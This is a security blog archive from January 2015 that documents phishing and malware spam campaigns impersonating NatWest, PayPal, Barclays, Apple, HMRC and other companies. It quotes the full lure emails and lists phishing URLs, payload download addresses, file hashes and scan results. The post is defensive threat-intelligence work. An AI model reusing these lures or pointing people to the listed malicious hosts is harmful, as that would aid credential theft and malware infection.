Saturday, 31 January 2015

You Have One Security Message NatWest CreditCard

Alert Summary:

You Have One Security Message From NatWest CreditCard emails saying that you You Have One Security Message

Sample Message headers:
From: NatWest CreditCard {CreditCardOnlineServices@cards.natwest.com}Subject: You Have One Security Message From NatWest CreditCard
Sample Message body:


Dear Customer,

You Have One Security Message From NatWest CreditCard Online Services center.

Log in below to view your message.

https://cardservices.natwest.com/RBSG_Consumer/Login.do?promoCode=NatWest

Thank you for banking with us.
Paul Riley
Head of Credit Cards

Please don't reply to this email. It is for notification only as this mailbox cannot
accept incoming mail. If you need to contact us then use the number on the
back of your credit card. You can also find useful telephone numbers by going to www.natwest.com/cardservices and selecting the 'Contact Us' link
The above link takes you to website, hosting a re-directed page:
http://surdolog.by/css.php
The above re-direct page, takes you to this domain, which hosts the phishing site:
http://diamondsandmuffins.com/app/NatWest.html?https://cardservices.natwest.com/RBSG_Consumer/Login.do?promoCode=NatWest

The fake phishing site above looks like this:



Cheers,
Steve
Sanesecurity.com

Friday, 30 January 2015

The credit card we have on file for your PayPal service was declined

The credit card we have on file for your PayPal service was declined phishing emails are arriving.

Headers:
From: "PayPal" {secure.p@ypl.com}
Subject: Account Access Information

 body:
Dear member,
The credit card we have on file for your PayPal service was declined when we attempted to bill you on 01/30/2015 for your most recent service fees.
For this reason, your service could be suspended.

You must update your billing information immediately in order to avoid any interruption to your services.
Once your credit card information is updated, you will be charged immediately, as soon as payment is received.
You can update your credit card simply by download the form attached in email Thanks.

Libby Barr

Managing Director, Customer Service

Email contains an attachment, containing a fake PayPal site:
Acount.html.html

Once you arrive at the fake site, you are asked to log in and provide details:




Cheers,

Steve
Sanesecurity.com

Garth Hutchison, BACS Transfer : Remittance for JSAG400GBP




Garth Hutchison, BACS Transfer : Remittance for JSAG400GBP mentioned on the blog earlier now has some faked "back-in-time" date headers (shown in yellow)

Thunderbird. v.24.2.0, released: December 10, 2013, so bit out of date.,
Headers:
Received: from static.vdc.vn (unknown [113.161.83.216)
    by plf-01.keele.netcentral.co.uk (Postfix) with ESMTP id 29DDA1DFC1B
    for {xxx@xxx.co.uk}; Fri, 30 Jan 2015 10:10:58 +0000 (GMT)
Message-ID: {0FXOYQ31.8814156@blumenthal.com}
Date: Wed, 21 Jan 2015 06:50:20 -0500
From: "Garth Hutchison" {accmng2556@blumenthal.com}
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0

Subject: BACS Transfer : Remittance for JSAG400GBP




BACS Transfer : Remittance for JSAG400GBP Garth Hutchison

BACS Transfer : Remittance for JSAG400GBP Garth Hutchison email being spammed containing a word document with embedded macro.

These emails aren't from Garth Hutchison at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Message Header: (Note: the Invoice number is random)

From: "Garth Hutchison" {accmng2556@blumenthal.com}
Subject: BACS Transfer : Remittance for JSAG400GBP
Message Body:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
 Attachment filename (word document with macros):

BACS_transfer_JS87123781237.doc
Md5 Hashes:
6001ed1e009de1a5f9021b613da7de60 [1]
f9d2458458dd49e9ce7c9894c540c4d5 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Decoded Macro [1]

Decoded Macro [2]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Me new photo / Hola mi foto malware

Me new photo / Hola mi foto malware in the form of a html email with an exe attachment:


Headers:
From:     "Juliya" {cognitionih53@supernatuaralworks.com}
Subject: Me new photo ;)
Subject: Hola mi foto

Message body1:

Me new photo ;)

Message body2:
hola mi foto :)


The attachment is a Windows executable:
my_new_photo_4327489327498237498239.exe

Md5 Hashes:
66412807813f54108d7b011f1ede6893
Malware Information:
VirusTotal Report [1] ( detected by 3/57 Virus Scanners)

Malwr Report [1]

  • Executed a process and injected code into it, probably while unpacking
  • Installs itself for autorun at Windows startup


Hybrid-Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Thursday, 29 January 2015

INTERNAL FAX You have received a new fax

INTERNAL FAX You have received a new fax email being spammed containing a Zip file


Message Header:


From: "INTERNAL FAX" {fax@bbc.co.uk}
Subject: You have received a new fax

You have received fax from EPSON91208382 at

Scan date: Thu, 29 Jan 2015 06:40:24 -0600

Number of page(s): 28

Resolution: 400x400 DPI

Name: fax167087861.pdf

_________________________________
Attached file is scanned image in PDF format
 Attachment filename:

fax167045861_pdf.zip
Inside Zip file: Windows Executable (double extension)

fax167987861_pdf.scr

Md5 Hashes:
31ee9b03837f432faaa259cf0c15e94a    [1]

Malware  information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]

  • Performs some HTTP requests
  • The binary likely contains encrypted or compressed data.
  • Steals private information from local Internet browsers
  • Creates an Alternate Data Stream (ADS)
  • Installs itself for autorun at Windows startup

Hybrid-Analysis Report [1]

Cheers,
Steve

Santander Bank Secure Notification Phish

Alert Summary:

Phishing: Santander Bank Secure Notification emails saying that you need to confirm your online banking details.

Sample Message headers:
To: Recipients {e-Documents.cs@sb.mobi}
From: "Santander  Bank  UK" {e-Documents.cs@sb.mobi}
Subject: Santander Bank Secure Notification
Sample Message body:
Valued Customer,

Please note that starting from January 24, 2015 we will be introducing new online banking authentication procedures in order to protect the private information of all online banking users.

You are required to confirm your online banking details with us as you will not be able to have access to your accounts until this has been done.

As you're already registered for online banking all you need to do is to confirm your online banking details.

Confirm your details

Once you've completed this you'll be able to manage your money whenever you want, giving you more control of your finances.

Regards
Customer Service
Santander Alert Team
The above link takes you to website, hosting a re-directed page:
http://leopard-sports.com/rev.htm
The above re-direct page, takes you to this domain, which hosts the phishing site:
http://www.sex-pleasuretoys.co.uk/image/data/santander/BtoChannelDriver.ssobto.html?dfpioudsfdav.santana.co.uk

The fake phishing site above looks like this:



Cheers,
Steve
Sanesecurity.com

Garth Hutchison BACS Transfer : Remittance for JSAG400GBP

Garth Hutchison BACS Transfer : Remittance for JSAG400GBP email being spammed containing a word document with embedded macro.

These emails aren't from Garth Hutchison at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Message Header: (Note: the Invoice number is random)

From: "Garth Hutchison" {accmng2556@blumenthal.com}
Subject: BACS Transfer : Remittance for JSAG400GBP
Message Body:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
 Attachment filename (word document with macros):

BACS_transfer_JS87123781237.doc
Md5 Hashes:
9530153534ced23bfac0416ad9cd2dc8 [1]
f84be9bda869daac41466b9519a89b65 [2]
cf79d1931d39863995aaf9e874575ee6 [3]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

VirusTotal Report [3] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Malwr Report [3]

Decoded Macro [1]

Decoded Macro [2]

Decoded Macro [3]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Invoice #10413 from SPOTLESS CLEANING

Invoice #10413 from SPOTLESS CLEANING email being spammed containing a word document with embedded macro.

These emails aren't from SPOTLESS CLEANING at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Message Header: (Note: the Invoice number is random)

From: paulamatos@btinternet.com
Subject: Invoice #10413 from SPOTLESS CLEANING
Message Body:
This message contains Invoice #10413 from SPOTLESS CLEANING.  If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.

SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ

07956 379907
 Attachment filename (word document with macros):

SPOTLESS CLEANING-Invoice-10413.doc
Md5 Hashes:
9530153534ced23bfac0416ad9cd2dc8 [1]
f84be9bda869daac41466b9519a89b65 [2]
cf79d1931d39863995aaf9e874575ee6 [3]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

VirusTotal Report [3] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Malwr Report [3]

Decoded Macro [1]

Decoded Macro [2]

Decoded Macro [3]

Payload Info:

Thanks to Dave:
Downloads hXXp://162.251.84.122/js/bin.exe as %TEMP%\hDnyDA.exe

md5 Hash: 600d1d0fa82c58e54f83d3b9917616e7 [4]

VirusTotal Report [4] (hits 2/57 Virus Scanners)

Malwr Report [4]

 Hybrid-Analysis Report [4]

Contacts Hosts:

185.48.56.72     80     TCP     United Kingdom
91.234.92.252     8080     TCP     Bulgaria
5.135.28.105     80     TCP     France

Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Wednesday, 28 January 2015

Ctb-locker cab file malware

Cab file Ctb-locker malware on the loose....

Headers: (example)
Subject: Zion Pentecostal Church
Message body (example)
Zion Pentecostal Church
865 3rd av, Rivers, MB R0K 1X0

CANADA
204-314-7471
Attached to the email is a CAB file (Examples)
carrieres_de_lestuaire.cab
dodd_engineering_ltd.cab
industriestr_16_57076_siegen.cab
ing_thomas_teubl_and_ing_herbert_teubl_baugesmbh.cab
the_vein_institute_of_toronto.cab
zins_david_dr.cab
zion_pentecostal_church.cab

On the Windows machine, Inside the zip, is Windows executable
the_vein_institute_of_toronto.scr

Md5 Hashes:
1873939f2b6ea98d0617a56ce0c2b0c6  [1]

Others...

2f30ff2449ee4dc2707c6d6e1380233 :carrieres_de_lestuaire.cab
092e4eba24b6e8add9ac2c7fe4f3ea79 dodd_engineering_ltd.cab
8f307e9cee602263ac1c4f8ed5d83df3 :industriestr_16_57076_siegen.cab
3219aa4c435105bafa45d14bb9237a22 :ing_thomas_teubl_and_ing_herbert_teubl_ba
ugesmbh.cab
f2da91034128ca52b9dc08d9d1b5fcb5 the_vein_institute_of_toronto.cab
c2aa7dfc29269e1f3d1e0738679c5fb2 zins_david_dr.cab
457ae42e7a30d5273565d5ea45aca108 zion_pentecostal_church.cab

Malware Information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]


Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Log in to PayPal to resolve a limitation on your account

Log in to PayPal to resolve a limitation on your account phishing emails are arriving.

Headers:
From: "PayPal" {dequeue@sbcglobal.net}
Subject: Recently, there's been activity in your account that seems unusual compared to your normal account activities.
Subject: Update Your Information
Subject: Log in to PayPal to resolve a limitation on your account

 body:
img
Account Status Update
Update account information
Response required
Upon receipt
Log in to PayPal to resolve a limitation on your account
Dear Client,

Recently, there's been activity in your account that seems uncommon compared to your normal account activities. Please log in to confirm your identity and update your account Personal details.

To help protect your account, no one can send money or withdraw money. In addition, no one can close your account, send refunds, remove any bank accounts, or remove credit cards.

What's going on?
We're concerned that someone is using your account without your knowledge. Recent activity on your account seems to have occurred from a suspicious location or under circumstances that may be different than usual.

What do I do?
Log in to your account as soon as possible. We may ask you to confirm information you provided when you created your account to make sure that you're the account holder.
update your information

What's next?
Once you've completed all the tasks, we'll remove all restrictions immediately.
forgot password

The Fake Paypal link:
http://icoi.org.ve/mapsoqr

Once you arrive at the fake site, you are asked to log in:



Cheers,

Steve
Sanesecurity.com

America Airlines Your Order APPROVED attached ticket word doc

America Airlines Your Order APPROVED attached ticket email being spammed containing a word document with embedded macro.

These emails aren't from America Airlines at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.


Message Header: (Note: the Order number is random)

From: "America Airlines" {tickets@aa.com}
Subject: Your Order#221188583 - APPROVED
Message Body:
Dear Customer,

Your credit card has been successfully processed.

FLIGHT NUMBER RY9451124US
ELECTRONIC 231697388
DATE & TIME / January 28th, 2015, 10:30 AM
ARRIVING / Washington
TOTAL PRICE / 480.77 USD

Please print your attached ticket.

For more information regarding your order, contact us by visiting : https://www.aa.com/contactAA/viewContactAAAccess.do?session=RY634542US


Thank you
America Airlines.
 Attachment filename (word document with macros):

20152701-7203849_ticket.doc
Md5 Hashes:
5c7f88a4d34620b07368b64c9dd2ff12   [1]

Malware Macro document information:

VirusTotal Report [1] (hits 3/57 Virus Scanners)

Malwr Report [1]

Hybrid-Analysis Report [1]


Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

workntrades.com scam

workntrades.com - another "money making" scam.... from the same people that brought you this one

Various Message Headers:
Subject: Hello!
Subject: Hi!
Subject: It's a very good thing
Subject: it's fantastic
Subject: Please look it
Subject: Special for you

Message Body:
Hi,

I guarantee that you will never ever look for other money making methods
after you watch this presentation!

Exceed your wildest financial goals NOW:

=> www.workntrades.com

Regards
Whois information for the domain:
Domain Name: WORKNTRADES.COM
Registrar: BIZCN.COM, INC.
Sponsoring Registrar IANA ID: 471
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.THEATRECONDO.NET
Name Server: NS2.THEATRECONDO.NET
Updated Date: 26-jan-2015
Creation Date: 26-jan-2015
Expiration Date: 26-jan-2016
Domain name: workntrades.com
Registry Domain ID: 1898316731_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http://www.bizcn.com
Updated Date: 2015-01-26T16:53:54Z
Creation Date: 2015-01-26T16:53:52Z
Registrar Registration Expiration Date: 2016-01-26T16:53:52Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Reseller: Cnobin Technology HK Limited
Registry Registrant ID: 
Registrant Name: Joseph Maudlin
Registrant Organization: Joseph N. Maudlin
Registrant Street: 2963 Doe Meadow Drive
Registrant City: Washington
Registrant State/Province: MD
Registrant Postal Code: 20004
Registrant Country: us
Registrant Phone: +1.3015563018
Registrant Phone Ext: 
Registrant Fax: +1.3015563018
Registrant Fax Ext: 
Registrant Email: info@workntrades.com

Here's the website you get, trying to "help" you with a "$500 a day" incentive !

Cheers,

Steve
Sanesecurity.com

Phishing Your Account - Barclays www1-barclays.com

Alert Summary:

Phishing: Your Account - Barclays www1-barclays.com phishing emails saying that you have mismatched infοrmatiο.

Sample Message headers:
From: Barclays {barclays@support.com}
Subject: Your Account - Barclays
Sample Message body:
Imροrtant Νοtice    
      
Dear Mr xxxxxxx,   
      
Τhis email οriginates frοm an autοmated system that detects when we haνe mismatched infοrmatiοn regarding a custοmer οr their accοunt. We may haνe cοntacted yοu already regarding this issue, if sο please ignοre this email. Ιt is essentiaΙ hοweνer, that we hοld the cοrrect infοrmatiοn as we use this infοrmatiοn tο νerify yοur identity whenever yοu call us οr perfοrm transactiοns οnline.    
      
 If yοu fail tο νerify yοur accοunt we may place a limitatiοn οn the serνices yοu access such as οnline and telephοne banκing and to avoid any further inconvenience we advise that you update these details within 24 hours.   
      
To begin the process simply click the link below.   
      
Get Started   
      
Ρlease nοte: Υου may alsο νerιfy yουr accουnt by νisiting yουr nearest branch. Tο lοcate yουr nearest branch please νisit ουr website


The above link to Apple site, doesn't take you there but instead takes you to a fake phishing site:
http://tiny.cc/barclays2
 The above URL redirector site, takes you to this domain:
http://www1-barclays.com/olb/auth/start.phpe

The fake phishing site above looks like this:

At first glance, it looks like the genuine barclays.com but look closely.... www1-barclays.com

The fake "BARCLAYS" domain was recently set-up, details here:
Domain Name: WWW1-BARCLAYS.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: RS133.REGISTRAR-SERVERS.COM
Name Server: RS33.REGISTRAR-SERVERS.COM
Updated Date: 25-jan-2015
Creation Date: 25-jan-2015
Expiration Date: 25-jan-2016

Domain Name: WWW1-BARCLAYS.COM
Registry Domain ID: 
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2015-01-25T19:27:29Z
Creation Date: 2015-01-25T19:27:28Z
Registrar Registration Expiration Date: 2016-01-25T19:27:28Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Registry Registrant ID: 
Registrant Name: David Ayeni
Registrant Organization: N/A
Registrant Street: 132 Victoria Road   
Registrant City: London
Registrant State/Province: London
Registrant Postal Code: RM1 2NX
Registrant Country: GB
Registrant Phone: +44.02039483949
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: davidayeni823@gmail.com
Registry Admin ID: 

The fake phishing site will also ask you to hand over more details...

Cheers,

Steve
Sanesecurity.com

Windsor Flowers Accounts Invoice Sheet1

Windsor Flowers Accounts Invoice 1385 email being spammed containing a word document with embedded macro.

These emails aren't from Windsor Flowers at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.
Company:

Welcome to Windsor Flowers, your local florist in London, offering an array of beautiful flower arrangements and bouquets.

Message Header: (Note: the Invoice number is random)

From: Windsor Flowers Accounts {windsorflowersaccounts@hotmail.com}
Subject: Windsor Flowers Invoice 1385
Message Body:
Dear Accounts payable

Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.

If you have any queries, please do not hesitate to contact me.

Many thanks in advance

Connie


Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277
www.windsorflowerslondon.co.uk
 Attachment filename (word document with macros):

Windsor Flowers Invoice 1385 Sheet1.doc
Md5 Hashes: (updated from earlier blog entry)
526f452d0442c6e2c59d8b0ea50a2222 [1]
770d6b25accb9cdc1b7f3421d9e5d201 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)


Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

RBS Morning commentary malware

RBS Morning commentary malware:

Headers:
From: "RBS.COM" {no-replay@rbs.com}
Subject: RBS Morning commentary
Message body:
PLEASE REFER TO THE DETAILS BELOW IF YOU ARE HAVING PROBLEMS READING THE ATTACHED FILE.

 Please do not contact your Treasury Centre for technical issues - these
should be routed to RBS FM support.

The attached file is in zip format; first you have to unzip it
(self-extracting archive, Adobe PDF) and then it can be viewed in Adobe
Acrobat Reader 3.0 or above. If you do not have a copy of the software
please contact your technical support department.

ALL SUMMARIES OF RESEARCH REPORTS INCLUDED IN THIS PAGE CONSTITUTE PART
OF THE RELEVANT REPORT WHICH IS ATTACHED AND ARE THEREFORE COVERED BY
THAT DOCUMENT'S DISCLAIMER AND DISTRIBUTION RESTRICTIONS.

Attached to the email is a ZIP file:
attachment3237001.zip

On the Windows machine, Inside the zip, is Windows executable
attachment.exe

Md5 Hashes:
cb2e98722e485cdf926f66451e57f2fa [1]

Malware Information:

VirusTotal Report [1] (hits 2/57 Virus Scanners)

Malwr Report [1]


Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Accounts Invoice 1385 Windsor Flowers

Accounts Invoice 1385 Windsor Flowers containing a word document with embedded macro.

Just a quick update to the earlier blog entry

Payload  (Thanks to Leigh Hall for the information):
Connects to: hxxp://vivercomrequinte.com.br/js/bin.exe
Creates file: %TEMP%\sdfsdferfwe.exe

Payload Md5 Hashes:
9b1df8529ce85a0d9ccd5378afb7cbaf   [1]

Payload Analysis:

VirusTotal Report [1] (hits 2/57 Virus Scanners)


Malwr Report [1]


Hybrid-Analysis Report [1]

Connects to host located in:

France, Bulgaria, United Kingdom, Bulgaria, France, Romania, Korea Republic of

Cheers,
Steve

update your Halifax account experian credit file phish


 update your Halifax account experian credit file phish:

Headers:
From: "Experian - Halifax Online"{experian@securesite.net}
Subject: update your Halifax account
Message body:
Dear Customer,

It has been reported to us by experian that some of our customers'
could find their Experian credit file does not reflect this due to an IT blunder at the bank.

Though Experian says the glitch means customers "may have missed out on positive data"
that might have increased their ability to get credit elsewhere.

In particular those upgrading from Halifax's basic bank account
? the Easycash Halifax bank account
? to a Reward Current Account may be adversely affected by the problem.

but in order for no one to be left out, we are requesting an account update
from all our customers, attached to this message is a form containing all
neccessary fields to enable us rectify this problem, please download and fill
all the form as all fields are required.

Thanks.
Attached to the email is a html file:
Halifax Online Update Form.html

The fake html phishing site looks like this...





Cheers,

Steve
Sanesecurity.com

Wysłane z mojego iPhone przez Tapatalk foto

Wysłane z mojego iPhone przez Tapatalk malware:

Headers:
Subject: Wysłane z mojego iPhone
Message body:
foto
Wysłane z mojego iPhone przez Tapatalk

Attached to the email is a ZIP file:
5ugshabe_foto_jpeg.zip

On the Windows machine, Inside the zip, is Windows executable (Note the dual extension)
5ugshabe_foto_jpeg.exe

Md5 Hashes:
0c4e3c7b93184122864ea65755732a3e [1]

Malware Information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]

Summary:

  • The binary likely contains encrypted or compressed data.
  • Executed a process and injected code into it, probably while unpacking
  • Installs itself for autorun at Windows startup

Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

phishing: Apple Account Suspended www1-apple.com

Alert Summary:

Phishing: Apple Account Suspended www1-apple.com phishing emails saying that Due tο a prοblem with sοme of your accοunt infοrmatiοn, we have tempοrarily lοcked yοur accοunt.

Sample Message headers:
From: Apple {do_not_reply@eur.apple.com}
Subject: Apple Account Suspended - Apple.com
Sample Message body:

This is an automated message, please do not reply.

Dear Αpple Custοmer,

Due tο a prοblem with sοme of your accοunt infοrmatiοn, we have tempοrarily lοcked yοur accοunt.

Whilst yοur accοunt is lοcked yοu will be unable tο use services such as the Αpp Stοre / iΤunes store and usage of iClοud will be limited.

To unlοck your accοunt we need you to update your accοunt infοrmatiοn.

Click the following link to update the infοrmatiοn on your accοunt.
Update now >
The reasοn we sent yοu this email is because ΑppΙe takes security very seriοusly and we need tο ensure that we have the mοst up tο date infοrmatiοn οn file fοr οur custοmers tο prevent unauthοrised use.

It may just be that yοur payment methοd has expired or your accοunt infοrmatiοn is incomplete.
In οrder to avοid yοur accοunt being permanently clοsed we require yοu tο update yοur infοrmation within 24 hοurs οf this email being sent.

If you have already validated your account within the last 48 hours then you do not have to do anything, simply ignore this message.
ΑppΙe Suppοrt

Case Ref: 481,077-00-30-8

The above link to Apple site, doesn't take you there but instead takes you to a fake phishing site:
http://tiny.cc/ty73sx
 The above URL redirector site, takes you to this domain:
http://www1-apple.com/signin?sslchannel=true

The fake phishing site above looks like this:
At first glance, it looks like the genuine apple.com but look closely.... www1-apple.com

The fake apple domain was recently set-up, details here:
Domain Name: WWW1-APPLE.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: RS133.REGISTRAR-SERVERS.COM
Name Server: RS33.REGISTRAR-SERVERS.COM
Updated Date: 26-jan-2015
Creation Date: 26-jan-2015
Expiration Date: 26-jan-2016

Domain Name: WWW1-APPLE.COM
Registry Domain ID: 
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2015-01-26T22:21:54Z
Creation Date: 2015-01-26T22:21:53Z
Registrar Registration Expiration Date: 2016-01-26T22:21:53Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Domain Status: clientTransferProhibited
Registry Registrant ID: 
Registrant Name: David Ayeni
Registrant Organization: N/A
Registrant Street: 132 Victoria Road   
Registrant City: London
Registrant State/Province: London
Registrant Postal Code: RM1 2NX
Registrant Country: GB
Registrant Phone: +44.02039483949
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: davidayeni823@gmail.com
The fake phishing site will also ask you to hand over your credit card details too....
Cheers,

Steve
Sanesecurity.com

Windsor Flowers Invoice 1385 Accounts word malware

Windsor Flowers Accounts Invoice 1385 email being spammed containing a word document with embedded macro.

These emails aren't from Windsor Flowers at all, they just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.
Company:

Welcome to Windsor Flowers, your local florist in London, offering an array of beautiful flower arrangements and bouquets.

Message Header: (Note: the Invoice number is random)

From: Windsor Flowers Accounts {windsorflowersaccounts@hotmail.com}
Subject: Windsor Flowers Invoice 1385
Message Body:
Dear Accounts payable

Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.

If you have any queries, please do not hesitate to contact me.

Many thanks in advance

Connie


Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277
www.windsorflowerslondon.co.uk
 Attachment filename (word document with macros):

Windsor Flowers Invoice 1385 Sheet1.doc
Md5 Hashes:
f10e42cca60a2a6636658666f3621aef  [1]
cfe3f3eec33374d418ad9460649c4943 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 2/57 Virus Scanners)

VirusTotal Report [2] (hits 2/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Decoded Macro [1]

Decoded Macro [2]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Tuesday, 27 January 2015

TAX REFUND NOTIFICATION eligible to receive a tax refund

TAX REFUND NOTIFICATION eligible to receive a tax refund phishing email, asking you to login and process your tax refund.

Headers:
From: "HM Revenue & Customs"{online-service@hmrc.gov.uk}
Subject: TAX REFUND NOTIFICATION
Message body:
HM Revenue & Customs (HMRC)
27/01/2015

TAX REFUND NOTIFICATION

Dear Sir/Madame,

After the last annual calculations of your fiscal activity we have
determined that you are eligible to receive a tax refund of 
648.35 GBP 
Please submit the tax refund request and allow us 6-9 days in order
to process it.

To access your tax refund, please follow the steps bellow:

- download the Tax Refund Form attached to this email
- open it in a browser (recommended mozilla firefox)
- follow the instructions on your screen


A refund can be delayed for a variety of reasons. For example 
submitting invalid records or applying after the deadline.

Revenue and Tax Administrator

HM Revenue & Customs
Tax Credit Office
